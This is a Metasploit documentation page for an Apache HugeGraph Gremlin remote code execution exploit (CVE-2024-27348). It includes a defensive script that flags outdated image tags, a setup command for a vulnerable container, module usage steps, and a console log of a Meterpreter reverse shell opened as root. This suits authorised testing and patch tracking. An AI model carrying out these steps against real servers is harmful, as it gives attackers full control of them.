metasploit-gs/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md
2025-07-17 09:53:40 +01:00


Vulnerable Application

This module exploits CVE-2024-27348, a Remote Code Execution (RCE) vulnerability in Apache HugeGraph Server versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server.
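
To find deployments that still need the upgrade, the following added example (not part of the module or of the HugeGraph project) classifies Docker image references against the fixed release 1.3.0. It assumes the `hugegraph/hugegraph` image name used in Setup and plain numeric version tags; the function names and the sample list are constructed for illustration.

```shell
# Added example: flag Apache HugeGraph image references older than 1.3.0,
# the release that fixes CVE-2024-27348. Function names are illustrative.
FIXED_VERSION="1.3.0"

# version_lt A B: succeed when dotted numeric version A is lower than B.
version_lt() {
  va="$1"; vb="$2"
  while [ -n "$va" ] || [ -n "$vb" ]; do
    x="${va%%.*}"; y="${vb%%.*}"
    if [ "${x:-0}" -lt "${y:-0}" ]; then return 0; fi
    if [ "${x:-0}" -gt "${y:-0}" ]; then return 1; fi
    case "$va" in *.*) va="${va#*.}" ;; *) va="" ;; esac
    case "$vb" in *.*) vb="${vb#*.}" ;; *) vb="" ;; esac
  done
  return 1
}

# classify_image REF: print vulnerable, patched, unknown or other.
classify_image() {
  ref="${1%%@*}"                     # drop any @sha256:... digest
  last="${ref##*/}"                  # the final path component holds the tag
  case "$last" in
    *:*) tag="${last##*:}"; repo="${ref%:*}" ;;
    *)   tag=""; repo="$ref" ;;
  esac
  case "$repo" in
    hugegraph/hugegraph|*/hugegraph/hugegraph) ;;  # with or without a registry
    *) echo other; return 0 ;;
  esac
  case "$tag" in                     # "latest" or no tag needs manual review
    ""|*[!0-9.]*|.*|*.|*..*) echo unknown; return 0 ;;
  esac
  if version_lt "$tag" "$FIXED_VERSION"; then echo vulnerable; else echo patched; fi
}

# scan_images: read image references on stdin and report those needing action.
# Live use: docker ps --format '{{.Image}}' | scan_images
scan_images() {
  while IFS= read -r image; do
    [ -n "$image" ] || continue
    status="$(classify_image "$image")"
    case "$status" in vulnerable|unknown) printf '%s\t%s\n' "$status" "$image" ;; esac
  done
}

# Constructed sample inventory (not real hosts or registries).
sample_images() {
  printf '%s\n' hugegraph/hugegraph:1.0.0 registry.example:5000/hugegraph/hugegraph:1.2.0 \
    hugegraph/hugegraph:1.3.0 hugegraph/hugegraph:latest nginx:1.25
}
sample_images | scan_images
```

References reported as `unknown` carry a tag such as `latest` that does not state a version, so the running release has to be confirmed on the host.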

Setup

To install a vulnerable instance via Docker, run the following command:

docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/apache_hugegraph_gremlin_rce
  3. Set the RHOST and LHOST options
  4. Run the module
  5. Receive a Meterpreter session as the root user.

Scenarios

Apache HugeGraph 1.0.0 docker instance


msf exploit(linux/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(linux/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(linux/http/apache_hugegraph_gremlin_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
[*] 127.0.0.1:9191 - Executing Automatic Target for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.1:53803) at 2024-07-29 13:59:20 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 11.4 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >